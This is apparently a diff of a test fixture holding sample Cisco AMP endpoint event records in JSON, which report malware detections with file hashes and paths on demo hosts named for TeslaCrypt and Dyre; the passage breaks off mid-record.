-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":60000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551546","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671118744584000,"timestamp":1610706397,"timestamp_nanoseconds":666000000,"date":"2021-01-15T10:26:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671118744584249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546488","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":274000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670856751579000,"timestamp":1610706336,"timestamp_nanoseconds":880000000,"date":"2021-01-15T10:25:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670856751579190","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} 
@@ -46,917 +38,5 @@ {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251520740131000,"timestamp":1610705860,"timestamp_nanoseconds":3000000,"date":"2021-01-15T10:17:40+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251520740130915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163617","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163616","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163615","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163613","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163612","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163610","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":816000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163609","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":738000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
